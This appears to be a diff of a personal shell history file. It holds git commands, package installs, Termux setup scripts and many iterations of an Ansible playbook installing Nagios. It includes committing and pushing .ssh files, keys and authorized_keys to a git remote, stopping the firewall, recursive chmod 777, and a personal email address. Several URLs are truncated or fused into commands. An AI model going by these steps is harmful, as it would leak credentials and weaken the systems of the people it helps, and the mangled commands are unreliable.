-type f -name "ftp_dirs.cfg" -exec print +find . -type f -name "ftp_dirs.cfg" -exec print {} /; +find . -type f -name "ftp_dirs.cfg" -exec print {} \; +find . -type f -name "ftp_dirs.cfg" +ls +ls -ltr | grep ^d +ls -ltr | grep ^d | tr +ls -ltr | grep ^d | tr " " +ls -ltr | grep ^d | tr -s " " +ls -ltr | grep ^d | tr -s " " | awk -F" " '{print $NF}' +find . -type f -name "ftp_dirs.cfg" -exec print {} \; +find . -type f -name "ftp_dirs.cfg" +find . -type f -name "ftp_dirs.cfg" | grep -v ^# +cat ./fiji/ftp_dirs.cfg +grep -c "20180507" TestingScripts.txt +grep -c "20180508" TestingScripts.txt +sum='expr `grep -c "20180507" TestingScripts.txt` + `grep -c "20180508" TestingScripts.txt`' +sum=$((expr `grep -c "20180507" TestingScripts.txt` + `grep -c "20180508" TestingScripts.txt`)) +sum=$((expr `grep -c "20180507" TestingScripts.txt` + `grep -c "20180508" TestingScripts.txt`)) +sum=$((expr `grep -c "20180507" TestingScripts.txt` + 10)) +sum=$((expr `grep -c "20180507" TestingScripts.txt` + 11)) +sum=$((`grep -c "20180507" TestingScripts.txt` + 11)) +echo $sum +pwd +find -type f -name "*~" +find -type f -name "*~" -exec rm {} \; +find -type f -name "*~" +find ./ -type f -name "*~" +find . -type f -name "*~" +find . -type f -name "*~*" +pwd +ls +find . -type f -name "*~*" +find -type f -name "*~" -exec rm {} \; +pwd +exit +git status +git stauts +git status +exit +find ./ -type f -name "*~*" +pwd +find .\ -type f -name "*~*" +find . -type f -name "*~*" +find . -type f -name "*.sql*" +find ./ -type f -name "*~*" +find ./ -type f -name "*~.sql" +find ./ -type f -name "*.sql" +find ./ -name "*.sql" +pwd +ls +ls -ltr +ls +find ./ -name "*.sql" +find ./ -type f -name "*~*" +find ./ -type f -name "*~*" -exec rm {} ;\ +find ./ -type f -name "*~*" -exec rm {} ;/ +find ./ -type f -name "*~*" -exec rm{} ;/ +find ./ -type f -name "*~*" -exec rm -i {} \; +ls +rm NewTables.sql +ls +mv VALIDATE_TABLES_PKG1.pk* backup/ +ls +clear +exiut +exit +git status +git add . +git commit -m"Updated for ODI Model" +git push -u origin master +git push -u origin master +exit +ls +df -h +du -h +clear +man du +man df +help df +exit +pip install pexpect +python -m pip install --upgrade pip +clear +man expect +expect +exit +vi msc_sftp.sh +ls +head er_types.cfg > msc_sgsn_er_types.cfg +rm msc_sgsn_er_types.cfg +head ftp_dirs.cfg > msc_sgsn_ftp.cfg +touch FILES_AUDIT_PKG.pks +touch FILES_AUDIT_PKG.pkb +find . -type f -name "*~" -exec rm {} \; +ls +rm er_types_hist* +ls +ls -a +mv .ersync\ -\ Copy/ .ersynchist +ls +exit +find -type f -name "*~*" -exec rm {}\; +find -type f -name "*~*" -exec rm \; +find -type f -name "*~*" -exec rm {} \; +clerar +exit +exit +pwd +ls +ls -ltr +ls -l +ls -lh +mkdir gittest +mkdir test ; cd test +pwd +touch a.txt b.txt c.txt d.txt +ls +ls -ls +chmod 711 a.txt +ls -lh +chmdor 755 a.txt +chmdod 755 a.txt +chmod 755 a.txt +ls -l +chmod 777 a.txt +ls -l; +pwd +cp test/ amit +cp -r test/ amit/ +ls +mv amit/ test +ls +ls +cp test/ test1 +cp -r test/ test1 +ls +mv test1/ test/ +ls +ls +ls -l +ls . +ls .. +touch a.c b.c +pwd +ls *.c +ls +ls *.c +pwd +find . -type f -name "*.c" +find . -type f -name "*.c" -exec -rm {};\ +find . -type f -name "*.c" -exec rm -i {};\ +find . -type f -name "*.c" -exec rm -i {} \; +find . -type f -name "*.c" +ls +ls +mv amit/* test1/ +ls amit/ +rmdir amit/ +mkdir amit +touch ./amit/a.c +ls amit/ +rmdir amit/ +rm -rf amit/ +pwd +ls -lrth +ls +ls -l .. +ls .. +ls ../KT/ +ls ../../ +python --version +python3 -m pip install --upgrade pip +python -m pip install --upgrade pip +python -m pip install --upgrade pip +python -m pip install jupyter +jupyter notebook +ls +ls +ls +exit +git clone +git clone +exit +python +python --version +python3 -m pip install --upgrade pip +python -m pip install --upgrade pip +ls +python3 +python +python -m pip --version +python -m pip install jupyter +python -m pip install jupyter +touch a.bad a.error +mkdir badfiles +touch a.txt b.txt +touch b.txt b.txt.bad b.txt.error +touch a.gz.txt b.txt c.gz d.gz.txt +exit +git status +git add . +git status +git add FmtPlus.opt +git status +git commit -m "Updated UI and Named SQL" +git status +git push -u origin master +clear +exit +head ER_802_PNG_LOG25_PP_20180713_22164.txt > a.txt +head ER_802_PNG_LOG25_PP_20180702_18722.txt.bad >> a.txt +ping +ping -t +vim +vi +clear +vim +ls +pwd +clear +vim +echo $PATH +python --version +vim +clear +where vim +vim --version |cat +vim --version +where vim +pwd +ls vim* +echo $home +echo $HOME +ls +clear +ls +pwd +vim --version +vi +echo ~ +clear +ls +ls +ls +vim +vi +vi +ls +ls +clear +vi test.py +vi +vi +ls +vi test.py +vi test.py +vi test.py +pwd +cat $ +echo ~ +cate ~/.minttyrc +cat ~/.minttyrc +ls +ls +ls -a +vi .gitconfig +python +python2 +vi .minttyrc +git init +git commit -m "First test" +git remote add origin +git remote add originselenium.git +git push -u origin master +:ruby puts RUBY_VERSION +ls +./package-nip2.sh +ls +./package-nip2.sh +apt +apt install nsis +ls +./package-nip2.sh +ls +ls +./package-nip2.sh +./package-nip2.sh +ls +ls +more build +more build.sh +./build.sh +./build.sh x +ls +./package-nip2.sh +echo $? +ls +ls nsis/ +ls +rm nip2-dev-w64-8.8.0.zip +ls +./package-nip2.sh +ls +ls inst/bin/*help* +ls inst/bin/*nip2* +./package-nip2.sh +./package-nip2.sh +ll +ls -l +./package-nip2.sh +ls -kl +./package-nip2.sh +ls -l +./package-nip2.sh +./package-nip2.sh +ls +./package-nip2.sh +ls inst/lib +ls inst/lib/goffice/ +ls nip2-8.8.0/lib/ +pwd +ls +./package-nip2.sh +ls nip2-8.8.0/lib +./package-nip2.sh +ls nip2-8.8.0/lib/ +ls nip2-8.8.0/lib/goffice/0.8.17/ +ls nip2-8.8.0/lib/goffice/0.8.17/plugins/plot_barcol/ +find nip2-8.8.0/lib/goffice/ -name "*.la" -or -name "*.a" -or -name "*.ui" +./package-nip2.sh +find nip2-8.8.0/lib/goffice/ -name "*.la" -or -name "*.a" -or -name "*.ui" +find nip2-8.8.0/lib/goffice/ -name "*.la" -or -name "*.a" -or -name "*.ui" -exec rm {} \; +find nip2-8.8.0/lib/goffice/ -name "*.la" -or -name "*.a" -or -name "*.ui" +find nip2-8.8.0/lib/goffice/ -name "*.la" -or -name "*.a" -or -name "*.ui" -exec rm -f {} \; +find nip2-8.8.0/lib/goffice/ -name "*.la" -or -name "*.a" -or -name "*.ui" +ls nip2-8.8.0/lib/goffice/0.8.17/plugins/plot_radar/radar.a +ls -l nip2-8.8.0/lib/goffice/0.8.17/plugins/plot_radar/radar.a +find nip2-8.8.0/lib/goffice/ -name "*.la" -or -name "*.a" -or -name "*.ui" -exec echo {} \; +find nip2-8.8.0/lib/goffice/ \( -name "*.la" -or -name "*.a" -or -name "*.ui" \) -exec echo {} \; +find nip2-8.8.0/lib/goffice/ \( -name "*.la" -or -name "*.a" -or -name "*.ui" \) -exec rm {} \; +find nip2-8.8.0/lib/goffice/ \( -name "*.la" -or -name "*.a" -or -name "*.ui" \) -exec echo {} \; +./package-nip2.sh +ls +ls -R +ls +pdw +pwd +ls +ls -R +ls +ls -R +./package-nip2.sh +./package-nip2.sh +apt-get update && apt-get full-upgrade +apt-get install autoconf automake bash-completion bc binutils-dev bison
+apt-get install bzip2 clang cmake coreutils ctags curl dialog diffutils dos2unix
+apt-get install expect ffmpeg findutils gawk git gnutls golang grep gzip
+apt-get install imagemagick jq less lynx m4 make man nano nodejs
+apt-get install openssh patch php-dev python readline-dev rlwrap rsync ruby-dev
+apt-get install sed sensible-utils sharutils sqlite tar texinfo tree unzip vim
+apt-get install w3m wget zip +apt-get install sed sensible-utils sharutils sqlite tar texinfo tree unzip vim +apt-get install openssh patch php-dev python readline-dev rlwrap rsync ruby-dev +apt-get install imagemagick jq less lynx m4 make man nano nodejs +apt-get install expect ffmpeg findutils gawk git gnutls golang grep gzip +apt-get install bzip2 clang cmake coreutils ctags curl dialog diffutils dos2unix
+apt-get install bzip2 clang cmake coreutils ctags curl dialog diffutils dos2unix +apt-get install autoconf automake bash-completion bc binutils-dev bison +apt-get install git tig htop +git init +git config --global user.email "electrikyouthx@hotmail.com" +git config --global user.name "electrikyouthh" +git config --help +#!/bin/bash +# +# script that passes password from stdin to ssh. +# +# Copyright (C) 2010 André Frimberger +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see ses/>. +# +# URL:ssh-password-from-stdin-the-openssh-5-6p1-compatible-way/ +# + +if [ -n "$SSH_ASKPASS_TMPFILE" ]; then cat “$SSH_ASKPASS_TMPFILE”; exit 0; elif [ $# -lt 1 ]; then echo “Usage: echo password | $0 ” >&2; exit 1; fi +git status +git add .bash_history +git add .gitconfig +git .ssh/ +git add .ssh +git status +git commit -m "git and configs" +git add '*.gitconfig' +git add '*.bash_history' +git add '*.keys' +git add '*.authorized_keys' +git add '.*ssh' +git commit -m 'add all . files' +git log +git remote add origin +git push -u origin master +git fetch +git push -u origin master +git push -u origin master +git fetch +git push -u origin master +git pull origin master +git pull -f origin master +git pull --help +git pull -ff origin master +git merge --allow-unrelated-histories +git pull --allow-unrelated-histories origin master +git push -u origin master +git push -u origin master +git pull origin master +git diff HEAD +git status +git add .viminfo +git commit -m "info added" +git push +git config --help +apt-get install autotools, curl, zlib, openssl +apt install autotools +apt install zlib +apt install expat +apt search +apt search expqt +logout +apt search expat +apt install libexpat-dev +apt-get install libiconv zlib curl +apt install libiconv +apt search libiconv +apt search curl +apt install libcurl-dev +apt search libssl +apt search libssl +apt search libssh +wgets/git/releases/download/v2.16.2.windows.1/Git-2.16.2-32-bit.exe +ls +exe +tar +rm -rR Git-2.16.2-32-bit.exe +ls +chmod 700 setup-android-sdk.sh +ls +wgets.edge.kernel.org/pub/software/scm/git/git-2.16.3.tar.gz +ls +tar xzf git-2.16.3.tar.gz +ls +ls +./configure +ls +automake ; make ; make install +ls +apt search pe +apt search perl +apt-get install pcre2 +perl -MLWP -le "print(LWP->VERSION)" +% perl -MCPAN -eshell +% perl -MCPAN -eshell +perldoc +perldoc CPAN +% perl -MCPAN -e shell +perl -MCPAN -e shell +ls +./configure +ls +./config.status +git status +git add ../.cpan/ +git add ../.wget-hsts +git add ../git-2.16.3.tar.gz +git add ./ +automake +autoconf +ls +make install +make gettext.o +make langinfo.h +make langinfo +make configure +make build +make git +ls +make cflags +make utils +make diff +make daemon +make worktree +make --help +make --always-make +ls +ls +rm -Rr git-2.16.3.tar.gz +ls +ls +#!/bin/sh +echo "This script sets up the Termux App." +masterzip_url= +masterzip_file="$HOME/tmp/termux-config-master.zip" +masterzip_dir="$HOME/tmp/termux-config" +master_dir="$masterzip_dir/termux-config-master" +package_file="$master_dir/data/packages.txt" +mkdir -p "$HOME/tmp" "$HOME/bin" +[ -f "$masterzip_file" ] || wget -O "$masterzip_file" "$masterzip_url" +rm -rf "$masterzip_dir" +mkdir -p "$masterzip_dir" +busybox unzip -d "$masterzip_dir" "$masterzip_file" +packages="`busybox sed 's, -.*,,' "$package_file"`" +apt install -y $packages +cp -rp "$master_dir/data/HOME/." "$HOME" +rm -f "$HOME/.vimrc" +ln -s ".vim/.vimrc" "$HOME/.vimrc" +exit $? +exit +gem +set -e +[ -z "${PREFIX}" ] && PREFIX=/data/data/com.termux/files/usr +if [ -z "${TMPDIR}" ]; then TMPDIR="${PREFIX}/tmp"; fi +if [ ! -e "${TMPDIR}" ]; then mkdir -p "${TMPDIR}"; fi +apt update +apt upgrade -y +apt install -y gnupg wget +wget -O "${TMPDIR}/pubkey.gpg"sitory/pubkey.gpg +apt-key add "${TMPDIR}/pubkey.gpg" +rm -f "${TMPDIR}/pubkey.gpg" +## Prevent duplicate entries in sources.list +sed -i '/https:\/\/xeffyr.github.io\/termux-x-repository/d' "${PREFIX}/etc/apt/sources.list" +ARCHITECTURE=$(uname -m) +if [ -z "${ARCHITECTURE}" ]; then echo "[!] Failed to determine your architecture."; echo " Using 'aarch64'. If this is wrong, please edit file"; echo " '\${PREFIX}/etc/apt/sources.list' to set a correct"; echo " architecture."; ARCHITECTURE="aarch64"; fi +case ${ARCHITECTURE} in armv7*) ARCHITECTURE="arm";; esac +echo "deb [arch=all,${ARCHITECTURE}]sitory/ termux x-gui" >> "${PREFIX}/etc/apt/sources.list" +apt update +git clonesitory.git +su +logout +midnight +su +logout +ls +ls +ls +ls +ld +ls +ls +mkdir nag_test1 +mv nag_test1/ test1 +ls ../nagios/ +nano ../nagios/server.nagios/tasks/setup-Debian-family-prerequisites.yml +ls +touch main.yml +nano main.yml +ls +nano jenkins.yml +nano test1 +ansible-playbook test1 +nano roles/test1/main.yml +nano roles/test1/packages +nano roles/test1/main.yml +nano roles/test1/packages +nano roles/test1/main.yml +nano roles/test1/packages +nano roles/test1/main.yml +nano roles/test1/packages +nano roles/test1/main.yml +ansible-playbook test1 +nano roles/test1/main.yml +nano roles/test1/packages +ls +nano test1 +ls roles/ +ls +nano main.yml +nano packages +ls +ls +nano nagios/nrpe.client/tasks/main.yml +ls +ls +mv packages packages.yml +ls +cat main.yml +nano main.yml +ls +ansible-playbook test1 +nano roles/test1/main.yml +nano roles/test1/packages.yml +tree +nano roles/test1/packages.yml +ansible-playbook test1 +ls +nano test1 +ls +ls +mv test1 test1.yml +nano test1.yml +ansible-playbook test1.yml +nano test1.yml +nano nagios_server +nano jenkins.yml +nano test1.yml +nano jenkins.yml +mkdir tasks +ls +mv main.yml packages.yml tasks/ +ls +ansible-playbook test1.yml +nano roles/test1/tasks/main.yml +ansible-playbook test1.yml +nano roles/test1/tasks/main.yml +ansible-playbook test1.yml +nano roles/test1/tasks/main.yml +ansible-playbook test1.yml +nano roles/test1/tasks/main.yml +ansible-playbook test1.yml +service httpd status +journalctl -xe +netstat -ant | grep 80 +lsof +service httpd stop +netstat -ant | grep 80 +ls +ls +ls +ls +ls +nano tasks/nagios-packages +ls +ls +nano test1.yml +nano /etc/ssh/sshd_config +service sshd restart +service ssh restart +service sshd restart +nano /etc/ssh/sshd_config +service sshd restart +ls +ls +ls +ls +ls +nano main.yml +cat main.yml +nano main.yml +nano main2.yml +ls +nano server-rhel.yml +cat packages.yml +nano server-rhel.yml +ls +nano packages.yml +ca main.yml +cat main.yml +mv main.yml main1.yml +ls +mv main2.yml main.yml +ls +cat main.yml +ansible-playbook /etc/ansible/test1.yml +ls +mv server-rhel.yml server-rhel.ymll +ansible-playbook /etc/ansible/test1.yml +mv server-rhel.ymll server-rhel.yml +ls +rm main.yml +ls +cat main1.yml +ll +nano main1.yml +mv main1.yml main.yml +ls +cat main.yml +ll +cat packages.yml +ll +nano server-rhel.yml +ll +nano server-rhel.yml +ll +cat main.yml +cat server-rhel.yml +cat /etc/group | grep nagios +cat /etc/group | grep nagcmd +ansible-playbook /etc/ansible/test1.yml +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml +which nagios +ls /etc/nagios/nagios.cfg +nano /etc/nagios/nagios.cfg +ip a +service nagios status +service nagios start +service httpd status +service nginx status +grep -ri listen /etc/apache2 +grep -ri listen /etc/httpd +ls /etc/httpd/run/htcacheclean/ +fuser 80/tcp +ps aux | grep 12787 +kill -9 12787 +kill -9 12788 +service httpd status +service httpd start +journalctl -xe +date +fuser 80/tcp +ps aux | grep 22140 +kill -9 22140 22142 +fuser 80/tcp +yum -qa nginx +rpm -qa nginx +yum list installed | grep nginx +yum list installed +yum list installed | grep n +yum list installed | grep "n" +find daemon +service httpd restart +systemctl status httpd.service +fuser 80/tcp +ps aux | grep 22361 22362 +ps aux | grep 22361 +ps aux | grep 22361 22362 +ps aux | grep 22362 +yum remove gitlab +yum install gitlab +which gitlab* +mv /var/www/html/mediawiki /var/www/html/mediawiki.backup +ls /bin/ +systemctl status --help +ls +nano server-rhel.yml +tar xvfssets.nagios.com/downloads/nagioscore/releases/nagios-4.3.2.tar.gz +tar --help +tar xvfssets.nagios.com/downloads/nagioscore/releases/nagios-4.3.2.tar.gz +yum install untar +ls +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml +ansible-playbook /etc/ansible/test1.yml --step +ls /tmp/ +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ll +nano nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +ll +nano server-rhel.yml +ls +nano test1.yml +ls +ls +mkdir vars +nano default-vars.yml +ls +nano ../tasks/packages.yml +nano ../tasks/nagios-packages +nano default-vars.yml +nano ../tasks/nagios-packages +nano default-vars.yml +nano ../tasks/nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +pwd +ls +nano ../../../test1.yml +ansible-playbook /etc/ansible/test1.yml --step +pwd +nano ../../../test1.yml +ansible-playbook /etc/ansible/test1.yml --step +nano ../../../test1.yml +ls +ansible-playbook /etc/ansible/test1.yml --step +ls +nano ../../../test1.yml +ansible-playbook /etc/ansible/test1.yml --step +nano default-vars.yml +nano ../tasks/nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +ls +nano tasks/nagios-packages +ls +nano tasks/server-rhel.yml +ls +nano vars/default-vars.yml +nano tasks/nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +ll /tmp/ +date +ls +nano tasks/nagios-packages +nano vars/default-vars.yml +nano tasks/nagios-packages +nano tasks/packages.yml +nano tasks/server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +ll /tmp/ +ls +nano tasks/server-rhel.yml +ls +ls +nano nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +nano nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +nano nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +nano nagios-packages +cat main.yml +nano nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +nano nagios-packages +ansible-playbook /etc/ansible/test1.yml --step +ls /tmp/ +yum install / +ls +nano server-rhel.yml +ls +nano vars/default-vars.yml +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +./configure +nano server-rhel.yml +nano ../vars/default-vars.yml +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ll +./configure +ls +nano tasks/server-rhel.yml +nano tasks/packages.yml +which unzip +ansible-playbook /etc/ansible/test1.yml --step +which unzip +nano tasks/packages.yml +ls +nano tasks/main.yml +ls +nano nagios-packages +nano packages.yml +ls +nano main.yml +nano packages.yml +ls +cat main.yml +nano main.yml +nano server-rhel.yml +nano packages.yml +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +pwd +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +ansible-playbook /etc/ansible/test1.retry +nano ../../../test1.retry +ansible-playbook /etc/ansible/test1.retry +nano ../../../test1.retry +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml +ansible-playbook /etc/ansible/test1.yml --step +ansible --version +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +pwd +- name: Go to the folder and execute command +ls +./configure +ls +ls +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.retry +cat /etc/ansible/ansible.retry +ansible-playbook /etc/ansible/test1.yml --step +nano a +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +nano server-rhel.yml +ll /etc/nagios/ +yum install lynx +service httpd status +gitlab-ctl remove +gitlab-ctl stop +service httpd start +service httpd status +lynx localhost +lynx localhost/nagios +service firewalld status +service firewalld stop +nano server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +htpasswd +yum install passlib +pip +yum install pip +pwd +ls +wgets/25/4b/6fbfc66aabb3017cd8c3bd97b37f769d7503ead2899bf76e570eb91270de/passlib-1.7.1.tar.gz +ls +tar xvf passlib-1.7.1.tar.gz +ls +ls +python install setup. +python install setup.py +python setup.py install +ls +ansible-playbook /etc/ansible/test1.yml --step +service nagios restart +which nagios +nano /etc/services +ls +nano packages.yml +nano nagios-packages +nano ../vars/default-vars.yml +nano nagios-packages +ls +nano nagios-packages +nano ../vars/default-vars.yml +nano nagios-packages +nano ../vars/default-vars.yml +nano nagios-packages +nano server-rhel.yml +ls +cat main.yml +cat nagios-packages +nano ../vars/default-vars.yml +cat ../vars/default-vars.yml +cat packages.yml +cat ../vars/default-vars.yml +cat server-rhel.yml +ansible-playbook /etc/ansible/test1.yml --step +service nagios status +service nrpe status +ll +nano ../vars/default-vars.yml +service nagios restatrt +service nagios restart +nagios --version +ls +nano main.yml +nano nagios-packages +nano packages.yml +nano server-rhel.yml +ls +nano test1.yml +ssh +ansible -m ping +nano hosts +ansible -m ping test +ansible -m ping all +ansible -m ping all --ask-sudo-pass +ls +ssh root@ +ls +nano hosts +ssh root@ +ssh-copy-id root@ +ansible -m ping all +ls +ls +nano test1.yml +ls +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +nano roles/test1/tasks/main.yml +nano roles/test1/tasks/nagios-packages +ansible-playbook test1.yml +ls +ls +nano tasks/server-rhel.yml +nano tasks/packages.yml +ls +cat tasks/main.yml +cat tasks/server-rhel.yml +ansible-playbook test1.yml +pwd +ansible-playbook test1.yml +nano test1.yml +ls +ls +nano tasks/main.yml +nano tasks/server-rhel.yml +nano tasks/main.yml +nano tasks/server-rhel.yml +nano tasks/main.yml +ll +ll +cat main.yml +cat packages.yml +cat server-rhel.yml +ll +cat nagios-packages +ls +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ls +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +bg +bg 1 +fg +nano roles/test1/tasks/server-rhel.yml +ll +nano test1.yml +ssh root@ +ssh-copy-id root@ +ls +ansible-playbook test1.yml +nano hosts +nano test1.yml +nano hosts +nano test1.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +ls +nano roles/test1/vars/default-vars.yml +fg 1 +nano roles/test1/tasks/server-rhel.yml +nano roles/test1/vars/default-vars.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +firewall-config +firewall-cmd +firewall-cmd --list +firewall-cmd --list-all +service firewalld start +ls +ls +ls +ls +vi server-rhel.yml +ls +ifconfig +vi server-rhel.yml +ls +nano tasks/server-rhel.yml +vi tasks/server-rhel.yml +ansible-playbook test1.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +vi roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +vi roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +vi roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +vi roles/test1/tasks/packages.yml +nano roles/test1/tasks/main.yml +nano roles/test1/tasks/packages.yml +nano roles/test1/tasks/rhel-packages.yml +nano roles/test1/tasks/main.yml +nano roles/test1/tasks/rhel-packages.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +nano roles/test1/vars/default-vars.yml +nano roles/test1/tasks/server-rhel.yml +ls +ls +ls +vi server-rhel.yml +ls +ls -lrta +chmod 777 -R nagios-4.3.2 +ansible-playbook test1.yml +vi roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +vi roles/test1/tasks/server-rhel.yml +ansible-playbook test1.yml +ls +nano tasks/server-rhel.yml +ll +rm test1.retry +ansible-playbook test1.yml +nano roles/test1/tasks/server-rhel.yml +ls +ls +ls +ls +ls +ls +nano tasks/server-rhel.yml +nano ../../test1.yml +nano tasks/server-rhel.yml +nano tasks/nagios-packages +nano tasks/main.yml +nano tasks/rhel-packages.yml +nano tasks/server-rhel.yml +nano ../../test1.yml +ls +cat test1.yml +ls roles/test1/ +ls roles/test1/tasks/main.yml +cat roles/test1/tasks/main.yml +man acl +getsebool -a | less +setsebool --help +getsebool | grep httpd +getsebool -a | grep httpd +getsebool -a +sysctl --help +sysctl --all +ls /lib/ +ls /lib/systemd/ +ls /lib/systemd/systemd-shutdown +cat /lib/systemd/systemd-shutdown +systemctl +service --status-aall +service --status-all +kill --help +man kill +cat /proc/zoneinfo +yum groups list hidden +yum install Fonts +yum install group Fonts +yum group list Font +yum group info Fonts +yum group list Fonts +yum group install "Fonts" +cat /tmp/yum_save_tx.2017-07-28.14-45.4NbJ0V.yumtx +yum group install "Fonts" +find --help +yum provides mariadb* +yum group list +yum install group "MySQL Database server" +yum group install "MySQL Database server" +yum groups mark install +ls +pwd +nano /etc/ansible/roles/test1/tasks/server-rhel.yml +nano /etc/ansible/roles/test1/tasks/packages.yml +ls +mkdir lampstack +ls +ls +nano php +cat ../jenkins.yml +nano php +ls /etc/yum.repos.d/ +cat /etc/yum.repos.d/webtatic.repo +yum install epel-release +yum install mod_php71w +yum clean all +ls +pwd +mkdir +mkdir pyth +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python ping.py +nano ping.py +python3 ping.py +yum install python3 +yum install bash-completion bash-completion-extras +init 6 +ls +ls +python ping.py +yum install python3 +yum update python 